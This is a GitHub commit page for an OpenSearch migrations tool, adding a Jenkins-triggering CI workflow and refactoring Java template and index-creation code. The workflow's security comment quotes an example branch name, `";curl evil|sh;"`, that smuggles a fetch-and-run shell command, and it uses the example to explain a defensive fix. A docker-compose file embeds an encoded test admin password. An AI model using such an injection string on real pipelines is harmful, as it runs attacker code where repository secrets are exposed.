Skip to content

Commit

Permalink
Merge remote-tracking branch 'origin/main' into user-agent-console
Browse files Browse the repository at this point in the history
Signed-off-by: Tanner Lewis <[email protected]>
  • Loading branch information
lewijacn committed Sep 19, 2024
2 parents b488a73 + d2dce08 commit 352f23b
Show file tree
Hide file tree
Showing 49 changed files with 1,073 additions and 688 deletions.
40 changes: 40 additions & 0 deletions .github/workflows/rfs_pr_e2e_test.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,40 @@
name: Jenkins

on:
  push:
    branches-ignore:
      - 'backport/**'
      - 'dependabot/**'
  pull_request_target:
    types: [opened, synchronize, reopened]

env:
  python-version: '3.11'

permissions:
  contents: read # to fetch code (actions/checkout)

jobs:
  rfs-e2e-aws-test:
    runs-on: ubuntu-latest
    steps:
      - name: Determine Github repository and branch
        id: determine-repo-vars
        # SECURITY: this workflow triggers on pull_request_target, which runs with
        # access to repository secrets. Never expand untrusted PR metadata (branch
        # name, fork repo name) directly inside the `run:` script body — a branch
        # named e.g. `";curl evil|sh;"` would be executed as shell. Routing the
        # values through `env:` makes them inert data instead of script text.
        env:
          PR_HEAD_BRANCH: ${{ github.event.pull_request.head.ref }}
          PR_HEAD_REPO: ${{ github.event.pull_request.head.repo.full_name }}
          PUSH_BRANCH: ${{ github.ref_name }}
          PUSH_REPO: ${{ github.repository }}
        run: |
          if [[ "${GITHUB_EVENT_NAME}" == "pull_request_target" ]]; then
            branch_name="${PR_HEAD_BRANCH}"
            pr_repo_url="https://github.com/${PR_HEAD_REPO}.git"
          else
            branch_name="${PUSH_BRANCH}"
            pr_repo_url="https://github.com/${PUSH_REPO}.git"
          fi
          echo "Running jenkins test on repo: $pr_repo_url and branch: $branch_name"
          echo "branch_name=$branch_name" >> "$GITHUB_OUTPUT"
          echo "pr_repo_url=$pr_repo_url" >> "$GITHUB_OUTPUT"
      - name: Jenkins Job Trigger and Monitor
        uses: lewijacn/[email protected]
        with:
          jenkins_url: "https://migrations.ci.opensearch.org"
          job_name: "rfs-default-e2e-test"
          api_token: "${{ secrets.JENKINS_MIGRATIONS_GENERIC_WEBHOOK_TOKEN }}"
          job_params: "GIT_REPO_URL=${{ steps.determine-repo-vars.outputs.pr_repo_url }},GIT_BRANCH=${{ steps.determine-repo-vars.outputs.branch_name }}"
Original file line number Diff line number Diff line change
Expand Up @@ -44,7 +44,7 @@ public List<String> createLegacyTemplates(GlobalMetadataData_OS_2_11 metadata, M
return createTemplates(
metadata.getTemplates(),
legacyTemplateAllowlist,
TemplateTypes.LegacyIndexTemplate,
TemplateTypes.LEGACY_INDEX_TEMPLATE,
mode,
context
);
Expand All @@ -54,7 +54,7 @@ public List<String> createComponentTemplates(GlobalMetadataData_OS_2_11 metadata
return createTemplates(
metadata.getComponentTemplates(),
componentTemplateAllowlist,
TemplateTypes.ComponentTemplates,
TemplateTypes.COMPONENT_TEMPLATE,
mode,
context
);
Expand All @@ -64,27 +64,27 @@ public List<String> createIndexTemplates(GlobalMetadataData_OS_2_11 metadata, Mi
return createTemplates(
metadata.getIndexTemplates(),
indexTemplateAllowlist,
TemplateTypes.IndexTemplate,
TemplateTypes.INDEX_TEMPLATE,
mode,
context
);
}

@AllArgsConstructor
private enum TemplateTypes {
IndexTemplate(
(client, name, body, context) -> client.createIndexTemplate(name, body, context.createMigrateTemplateContext()),
(client, name) -> client.hasIndexTemplate(name)
INDEX_TEMPLATE(
(targetClient, name, body, context) -> targetClient.createIndexTemplate(name, body, context.createMigrateTemplateContext()),
(targetClient, name) -> targetClient.hasIndexTemplate(name)
),

LegacyIndexTemplate(
(client, name, body, context) -> client.createLegacyTemplate(name, body, context.createMigrateLegacyTemplateContext()),
(client, name) -> client.hasLegacyTemplate(name)
LEGACY_INDEX_TEMPLATE(
(targetClient, name, body, context) -> targetClient.createLegacyTemplate(name, body, context.createMigrateLegacyTemplateContext()),
(targetClient, name) -> targetClient.hasLegacyTemplate(name)
),

ComponentTemplates(
(client, name, body, context) -> client.createComponentTemplate(name, body, context.createComponentTemplateContext()),
(client, name) -> client.hasComponentTemplate(name)
COMPONENT_TEMPLATE(
(targetClient, name, body, context) -> targetClient.createComponentTemplate(name, body, context.createComponentTemplateContext()),
(targetClient, name) -> targetClient.hasComponentTemplate(name)
);
final TemplateCreator creator;
final TemplateExistsCheck alreadyExistsCheck;
Expand Down Expand Up @@ -118,7 +118,7 @@ private List<String> createTemplates(
return List.of();
}

if (templateAllowlist != null && templateAllowlist.size() == 0) {
if (templateAllowlist != null && templateAllowlist.isEmpty()) {
log.info("No {} in specified allowlist", templateType);
return List.of();
} else if (templateAllowlist != null) {
Expand All @@ -144,24 +144,21 @@ private List<String> createTemplates(

templatesToCreate.forEach((templateName, templateBody) -> {
log.info("Creating {}: {}", templateType, templateName);
switch (mode) {
case SIMULATE:
var alreadyExists = templateType.alreadyExistsCheck.templateAlreadyExists(client, templateName);
if (!alreadyExists) {
templateList.add(templateName);
} else {
log.warn("Template {} already exists on the target, it will not be created during a migration", templateName);
}
break;

case PERFORM:
var createdTemplate = templateType.creator.createTemplate(client, templateName, templateBody, context);
if (createdTemplate.isPresent()) {
templateList.add(templateName);
} else {
log.warn("Template {} already exists on the target, unable to create", templateName);
}
break;

if (mode == MigrationMode.SIMULATE) {
var alreadyExists = templateType.alreadyExistsCheck.templateAlreadyExists(client, templateName);
if (!alreadyExists) {
templateList.add(templateName);
} else {
log.warn("Template {} already exists on the target, it will not be created during a migration", templateName);
}
} else if (mode == MigrationMode.PERFORM) {
var createdTemplate = templateType.creator.createTemplate(client, templateName, templateBody, context);
if (createdTemplate.isPresent()) {
templateList.add(templateName);
} else {
log.warn("Template {} already exists on the target, unable to create", templateName);
}
}
});

Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -21,16 +21,18 @@ public ObjectNode getTemplates() {
}

public ObjectNode getIndexTemplates() {
if (root.get("index_template") != null) {
return (ObjectNode) root.get("index_template").get("index_template");
String indexTemplateKey = "index_template";
if (root.get(indexTemplateKey) != null) {
return (ObjectNode) root.get(indexTemplateKey).get(indexTemplateKey);
} else {
return null;
}
}

public ObjectNode getComponentTemplates() {
if (root.get("component_template") != null) {
return (ObjectNode) root.get("component_template").get("component_template");
String componentTemplateKey = "component_template";
if (root.get(componentTemplateKey) != null) {
return (ObjectNode) root.get(componentTemplateKey).get(componentTemplateKey);
} else {
return null;
}
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -42,11 +42,10 @@ public boolean create(

// Create the index; it's fine if it already exists
try {
switch (mode) {
case SIMULATE:
return !client.hasIndex(index.getName());
case PERFORM:
return client.createIndex(index.getName(), body, context).isPresent();
if (mode == MigrationMode.SIMULATE) {
return !client.hasIndex(index.getName());
} else if (mode == MigrationMode.PERFORM) {
return client.createIndex(index.getName(), body, context).isPresent();
}
} catch (InvalidResponse invalidResponse) {
var illegalArguments = invalidResponse.getIllegalArguments();
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -24,7 +24,8 @@ public JsonNode getAliases() {

@Override
public String getId() {
return indexName;
// The ID is the name in this case
return getName();
}

@Override
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -109,8 +109,7 @@ Mono<ObjectNode> getJsonForIndexApis(HttpResponse resp) {
var tree = (ObjectNode) objectMapper.readTree(resp.body);
return Mono.just(tree);
} catch (Exception e) {
log.error("Unable to get json response: ", e);
return Mono.error(new OperationFailed("Unable to get json response: " + e.getMessage(), resp));
return logAndReturnJsonError(e, resp);
}
}

Expand Down Expand Up @@ -140,8 +139,13 @@ Mono<ObjectNode> getJsonForTemplateApis(HttpResponse resp) {
}
return Mono.just(tree);
} catch (Exception e) {
log.error("Unable to get json response: ", e);
return Mono.error(new OperationFailed("Unable to get json response: " + e.getMessage(), resp));
return logAndReturnJsonError(e, resp);
}
}

/**
 * Logs the given exception at error level and converts it into a terminal
 * {@code OperationFailed} error signal, so both JSON-parsing call sites
 * ({@code getJsonForIndexApis}, {@code getJsonForTemplateApis}) share one
 * consistent failure path and message prefix.
 *
 * @param e    the exception raised while reading/parsing the response body as JSON
 * @param resp the HTTP response whose body could not be parsed; attached to the error for context
 * @return a {@code Mono} that terminates with {@code OperationFailed} carrying the prefixed cause message
 */
Mono<ObjectNode> logAndReturnJsonError(Exception e, HttpResponse resp) {
String errorPrefix = "Unable to get json response: ";
log.atError().setCause(e).setMessage(errorPrefix).log();
return Mono.error(new OperationFailed(errorPrefix + e.getMessage(), resp));
}
}
Original file line number Diff line number Diff line change
Expand Up @@ -124,10 +124,10 @@ private CodedOutputStreamHolder getOrCreateCodedOutputStreamHolder() throws IOEx
} else {
currentCodedOutputStreamHolderOrNull = streamManager.createStream();
var currentCodedOutputStream = currentCodedOutputStreamHolderOrNull.getOutputStream();
// e.g. 1: "9a25a4fffe620014-00034cfa-00000001-d208faac76346d02-864e38e2"
// e.g. <pre> 1: "9a25a4fffe620014-00034cfa-00000001-d208faac76346d02-864e38e2" </pre>
currentCodedOutputStream.writeString(TrafficStream.CONNECTIONID_FIELD_NUMBER, connectionIdString);
if (nodeIdString != null) {
// e.g. 5: "5ae27fca-0ac4-11ee-be56-0242ac120002"
// e.g. <pre> 5: "5ae27fca-0ac4-11ee-be56-0242ac120002" </pre>
currentCodedOutputStream.writeString(TrafficStream.NODEID_FIELD_NUMBER, nodeIdString);
}
if (eomsSoFar > 0) {
Expand Down Expand Up @@ -213,11 +213,11 @@ private void beginSubstreamObservation(
numFlushesSoFar + 1
)
);
// e.g. 2 {
// e.g. <pre> 2 { </pre>
writeTrafficStreamTag(TrafficStream.SUBSTREAM_FIELD_NUMBER);
// Write observation content length
getOrCreateCodedOutputStream().writeUInt32NoTag(observationContentSize);
// e.g. 1 { 1: 1234 2: 1234 }
// e.g. <pre> 1 { 1: 1234 2: 1234 } </pre>
writeTimestampForNowToCurrentStream(timestamp);
}

Expand Down Expand Up @@ -371,7 +371,7 @@ private void addStringMessage(int captureFieldNumber, int dataFieldNumber, Insta
lengthSize = CodedOutputStream.computeInt32SizeNoTag(dataSize);
}
beginSubstreamObservation(timestamp, captureFieldNumber, dataSize + lengthSize);
// e.g. 4 {
// e.g. <pre> 4 { </pre>
writeObservationTag(captureFieldNumber);
if (dataSize > 0) {
getOrCreateCodedOutputStream().writeInt32NoTag(dataSize);
Expand Down Expand Up @@ -461,7 +461,7 @@ private void addSubstreamMessage(
captureClosureLength = CodedOutputStream.computeInt32SizeNoTag(dataSize + segmentCountSize);
}
beginSubstreamObservation(timestamp, captureFieldNumber, captureClosureLength + dataSize + segmentCountSize);
// e.g. 4 {
// e.g. <pre> 4 { </pre>
writeObservationTag(captureFieldNumber);
if (dataSize > 0) {
// Write size of data after capture tag
Expand Down Expand Up @@ -578,7 +578,7 @@ private void writeEndOfHttpMessage(Instant timestamp) throws IOException {
);
int eomDataSize = eomPairSize + CodedOutputStream.computeInt32SizeNoTag(eomPairSize);
beginSubstreamObservation(timestamp, TrafficObservation.ENDOFMESSAGEINDICATOR_FIELD_NUMBER, eomDataSize);
// e.g. 15 {
// e.g. <pre> 15 { </pre>
writeObservationTag(TrafficObservation.ENDOFMESSAGEINDICATOR_FIELD_NUMBER);
getOrCreateCodedOutputStream().writeUInt32NoTag(eomPairSize);
getOrCreateCodedOutputStream().writeInt32(
Expand Down Expand Up @@ -650,6 +650,8 @@ public boolean isOpen() {
}

@Override
public void close() {}
public void close() {
// No resources to close
}
}
}
Original file line number Diff line number Diff line change
Expand Up @@ -78,7 +78,7 @@ services:
condition: service_started
opensearchtarget:
condition: service_started
command: /bin/sh -c "/runJavaWithClasspath.sh org.opensearch.migrations.replay.TrafficReplayer --speedup-factor 2 https://opensearchtarget:9200 --auth-header-value Basic\\ YWRtaW46bXlTdHJvbmdQYXNzd29yZDEyMyE= --insecure --kafka-traffic-brokers kafka:9092 --kafka-traffic-topic logging-traffic-topic --kafka-traffic-group-id logging-group-default --otelCollectorEndpoint http://otel-collector:4317"
command: /bin/sh -c "/runJavaWithClasspath.sh org.opensearch.migrations.replay.TrafficReplayer --speedup-factor 2 https://opensearchtarget:9200 --auth-header-value Basic\\ YWRtaW46bXlTdHJvbmdQYXNzd29yZDEyMyE= --insecure --kafka-traffic-brokers kafka:9092 --kafka-traffic-topic logging-traffic-topic --kafka-traffic-group-id logging-group-default --otelCollectorEndpoint http://otel-collector:4317" #--transformer-config-base64 W3sgIkpzb25Kb2x0VHJhbnNmb3JtZXJQcm92aWRlciI6ClsKICB7CiAgICAic2NyaXB0IjogewogICAgICAib3BlcmF0aW9uIjogInNoaWZ0IiwKICAgICAgInNwZWMiOiB7CiAgICAgICAgIm1ldGhvZCI6ICJtZXRob2QiLAogICAgICAgICJVUkkiOiAiVVJJIiwKICAgICAgICAiaGVhZGVycyI6ICJoZWFkZXJzIiwKICAgICAgICAicGF5bG9hZCI6IHsKICAgICAgICAgICJpbmxpbmVkSnNvbkJvZHkiOiB7CiAgICAgICAgICAgICJ0b3AiOiB7CiAgICAgICAgICAgICAgInRhZ1RvRXhjaXNlIjogewogICAgICAgICAgICAgICAgIioiOiAicGF5bG9hZC5pbmxpbmVkSnNvbkJvZHkudG9wLiYiIAogICAgICAgICAgICAgIH0sCiAgICAgICAgICAgICAgIioiOiAicGF5bG9hZC5pbmxpbmVkSnNvbkJvZHkudG9wLiYiCiAgICAgICAgICAgIH0sCiAgICAgICAgICAiKiI6ICJwYXlsb2FkLmlubGluZWRKc29uQm9keS4mIgogICAgICAgICAgfQogICAgICAgIH0KICAgICAgfQogICAgfQogIH0sIAogewogICAic2NyaXB0IjogewogICAgICJvcGVyYXRpb24iOiAibW9kaWZ5LW92ZXJ3cml0ZS1iZXRhIiwKICAgICAic3BlYyI6IHsKICAgICAgICJVUkkiOiAiPXNwbGl0KCcvZXh0cmFUaGluZ1RvUmVtb3ZlJyxAKDEsJikpIgogICAgIH0KICB9CiB9LAogewogICAic2NyaXB0IjogewogICAgICJvcGVyYXRpb24iOiAibW9kaWZ5LW92ZXJ3cml0ZS1iZXRhIiwKICAgICAic3BlYyI6IHsKICAgICAgICJVUkkiOiAiPWpvaW4oJycsQCgxLCYpKSIKICAgICB9CiAgfQogfQpdCn1dCg=="

opensearchtarget:
image: 'opensearchproject/opensearch:2.15.0'
Expand Down
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
## Monitoring Progress via Instrumentation

The replayer and capture proxy (if started with the `--otelCollectorEndpoint` argument) emit metrics through an
otel-collector endpoint, which is deployed within Migrations Assistant tasks as a sidecar container. The
otel-collectors will publish metrics and traces to Amazon CloudWatch and AWS X-Ray.

Some of these metrics will show simple progress, such as bytes or records transmitted. Other records can show higher
level information, such as the number of responses with status codes that match vs those that don't. To observe those,
search for `statusCodesMatch` in the CloudWatch Console. That's emitted as an attribute along with the method and
the source/target status code (rounded down to the last hundred; i.e. a status code of 201 has a 200 attribute).

Other metrics will show latencies, the number of requests, unique connections at a time and more. Low-level and
high-level metrics are being improved and added. For the latest information, see the
[README.md](../../../../../../coreUtilities/README.md).

Along with metrics, traces are emitted by the replayer and the proxy (when the proxy is run with metrics enabled, e.g. by
launching with `--otelCollectorEndpoint` set to the otel-collector sidecar). Traces will include very granular data for
each connection, including how long the TCP connections are open, how long the source and target clusters took to send
a response, as well as other internal details that can explain the progress of each request.

Notice that traces for the replayer will show connections and Kafka records open, in some cases, much longer than their
representative HTTP transactions. This is because records are considered 'active' to the replayer until they are
committed and records are only committed once _all_ previous records have also been committed. Details such as that
are defensive for when further diagnosis is necessary.
Original file line number Diff line number Diff line change
@@ -1,11 +1,13 @@
package org.opensearch.migrations.trafficcapture.proxyserver.testcontainers;

import org.opensearch.migrations.testutils.SharedDockerImageNames;

import org.testcontainers.containers.GenericContainer;

public class HttpdContainerTestBase extends TestContainerTestBase<GenericContainer<?>> {

private static final GenericContainer<?> httpd = new GenericContainer("httpd:alpine").withExposedPorts(80); // Container
// Port
private static final GenericContainer<?> httpd = new GenericContainer(SharedDockerImageNames.HTTPD)
.withExposedPorts(80); // Container Port

public GenericContainer<?> getContainer() {
return httpd;
Expand Down
Original file line number Diff line number Diff line change
@@ -1,13 +1,12 @@
package org.opensearch.migrations.trafficcapture.proxyserver.testcontainers;

import org.opensearch.migrations.testutils.SharedDockerImageNames;

import org.testcontainers.containers.KafkaContainer;
import org.testcontainers.utility.DockerImageName;

public class KafkaContainerTestBase extends TestContainerTestBase<KafkaContainer> {

private static final KafkaContainer kafka = new KafkaContainer(
DockerImageName.parse("confluentinc/cp-kafka:latest")
);
private static final KafkaContainer kafka = new KafkaContainer(SharedDockerImageNames.KAFKA);

public KafkaContainer getContainer() {
return kafka;
Expand Down
Loading

0 comments on commit 352f23b

Please sign in to comment.